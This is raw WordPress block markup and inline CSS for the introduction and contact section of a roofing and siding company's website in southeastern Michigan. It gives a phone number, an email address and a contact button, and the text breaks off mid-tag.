.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing&nbsp;have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"8122658a-190a-460d-b1f0-852c8f7b6cfb\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-8122658a-190a-460d-b1f0-852c8f7b6cfb background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"3f3409af-10de-4bfb-a401-d63abd88d5a8\"} -->\n<style type=\"text/css\"> .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-3f3409af-10de-4bfb-a401-d63abd88d5a8 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"7a9bd093-61fd-4461-ab61-5fdfe90ebaf2\"} -->\n<style type=\"text/css\"> .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"744c4272-12fe-4eab-a56a-52601a4ce53f\"} -->\n<style type=\"text/css\"> .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000&nbsp;</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"877b3099-59ef-4060-8f90-6cc25a54ff76\"} -->\n<style type=\"text/css\"> .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-877b3099-59ef-4060-8f90-6cc25a54ff76\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"9e8d4684-2921-4739-9ff7-fab97cf7d308\"} -->\n<style type=\"text/css\"> .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"bf607241-86b3-436c-b825-588f4943f62b\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-bf607241-86b3-436c-b825-588f4943f62b .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style 